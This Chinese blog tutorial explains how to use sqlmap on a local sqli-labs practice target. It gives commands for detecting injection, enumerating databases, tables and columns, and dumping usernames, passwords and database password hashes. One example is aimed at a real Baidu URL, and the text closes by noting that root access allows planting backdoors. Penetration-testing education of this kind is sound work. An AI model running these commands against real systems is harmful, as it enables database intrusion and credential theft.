Web渗透-Sqlmap工具使用

这篇具有很好参考价值的文章主要介绍了Web渗透-Sqlmap工具使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、SQLMap详解

SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。

二、Sqlmap使用(以注入sql-libs为例):

1、判断是否存在注入

我们将疑似存在注入漏洞的地址获取到,目标注入点地址是http://127.0.0.1/sqli/Less-1/?id=8,在sqlmap里执行命令:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8

结果显示:

Web渗透-Sqlmap工具使用

分析反馈信息:

1. 检测到数据库可能是'mysql'
2. 存在一个注入参数'id'并且为get类型
3. 显示了使用的各种注入类型,和具体构造的payload

如果说在注入过程中URL中有多个参数时,我们应该在地址上面加双引号,例如:

sqlmap.py -u "https://kaifa.baidu.com/searchPage?wd=sqlmap & hmsr=aladdin"
2、判断文本中的请求是否存在注入

以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。txt文件中内容为web数据包,我们可以通过以下命令判断是否存在注入:

sqlmap.py -r target.txt

这里的txt文件要放在Sqlmap所在文件夹同目录下

Web渗透-Sqlmap工具使用

Web渗透-Sqlmap工具使用

同样我们也可以用-p指定要注入的参数名

sqlmap.py -r target.txt -p title,content
3、查询当前用户下所有的数据库

如果当前用户的权限可以读取所有数据库列表信息我们则可以通过以下命令获取到所有数据库名称:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --dbs

结果显示:

Web渗透-Sqlmap工具使用

3、获取当前数据库的名称

当我们注入站点后需要获得一些数据,则需要获得当前数据库名称进而执行以后操作:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --current-db

结果显示:Web渗透-Sqlmap工具使用

4、获取数据库中的表名

当我们查询完数据库后应查出数据库中存在的表名,如下:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 -D security --tables

这里的-D参数是指定数据库;–tables是查询指定数据库里面的表

结果显示:

Web渗透-Sqlmap工具使用

分析反馈信息:

我们应该根据我们想获得数据的内容,以目的性的去探查表。
比如我们想获得账号和密码,显然根据表的回显,我们应该去查看users表
5、获取表中的字段名

当查询完表后,应该去查询表内的所有字段名,命令如下:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 -D security -T users --columns

这里的-T参数是指定表;–columns是查询指定表里面的字段

结果显示:

Web渗透-Sqlmap工具使用

6、获取字段内容

以下是查询完字段后获取字段具体数据信息的命令

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 -D security -T users -C id,username,password --dump

结果显示:

Web渗透-Sqlmap工具使用

三、其他常用方法:

1、获取数据库所有用户

以下命令作用是列出数据库中的所有用户,如果权限允许还可以查询到包含所有用户的表:

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --users

结果显示:Web渗透-Sqlmap工具使用

2、获取数据库用户密码
sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --passwords

结果显示:

Web渗透-Sqlmap工具使用

在执行过程中可能存在很多选择默认情况下都是y,可以通过加一个–batch参数来默认执行,加快效率

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --passwords --batch
3、获取当前数据库用户名称

该命令可以列出网站使用数据库用户

sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=8 --current-user

结果显示:Web渗透-Sqlmap工具使用这里显示的是root用户权限很高,这可以帮助我们在进阶注入时,帮助我们在数据库写入后门等其他操作!文章来源地址https://www.toymoban.com/news/detail-451947.html

到了这里,关于Web渗透-Sqlmap工具使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 (也可以拿自己的环镜来玩,我是用pikachu靶场来演示的) 【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程(提供靶场代码及工具)_网络安全_Ai

    2024年02月08日
    浏览(51)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(42)
  • 【SQLMap工具】SQLMap基础及简单使用方法

    SQLMap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url(域名)的SQL注入漏洞。SQLMap支持的数据库有MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 相对于手工注入,sqlmap的高效注入大大提高了我们渗透效率。

    2024年02月10日
    浏览(45)
  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(44)
  • sqlmap渗透实战进阶技巧

    目录 基础指令 指定参数 指定注入方式 修改默认的浏览器 绕过防火墙拦截 命令执行 读取和写入文件 dns-domain 注入 编写tamper模块绕过waf 暴力穷举表字段 基础指令 --dbms 指定攻击的数据引擎 -v 输出信息详细等级为1 --batch 会自动进行默认操作,不用进行交互信息确定 --flush-s

    2024年02月05日
    浏览(39)
  • Sqlmap工具使用笔记

    SQLmap建议使用kali版本的 不建议使用windows版本 攻击的时候建议使用vps去攻击 否则本地ip会很快被封 本身是使用python编写的 非常厉害 基本人手一个  而且是开源的 可以自行重写改造开发 如果sqlmap攻击比较慢 要么是网站比较慢 或者是有防火墙,这款软件本身是有指纹的 可能

    2024年02月06日
    浏览(40)
  • 【sqlmap工具的使用】

    .命令基础解析 sqlmap 支持五种不同的注入模式: 1、 基于布尔的盲注, 即可以根据返回页面判断条件真假的注入。 2、 基于时间的盲注, 即不能根据页面返回内容判断任何信息, 用条件语句查看 时间延迟语句是否执行(即页面返回时间是否增加) 来判断。 3、 基于报错注

    2024年02月08日
    浏览(33)
  • Web攻防06_sqlmap的使用

    参考链接: https://blog.csdn.net/Goodric/article/details/115875009 https://www.cnblogs.com/bmjoker/p/9326258.html sqlmap 是一个开源渗透测试工具,可以自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。 注入测试方面有一个sqlmap就足够了,支持多种常用数据库注入。 支持五种不同的注

    2024年02月06日
    浏览(35)
  • SQLMAP工具 详细使用方法

    官方网址 GitHub地址 使用手册 SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏 洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据 库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可

    2024年02月11日
    浏览(45)
  • 渗透测试-sqlmap绕过WAF脚本编写

    Sqlmap一款功能强大集成了多种数据库识别及注入方式,多用于识别和利用Web 应用程序注入漏洞的工具,它的优点在于集成了大量 payload,对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 我们之前学习时间盲注的时候,可以针对时间盲注类型的漏洞

    2024年02月09日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包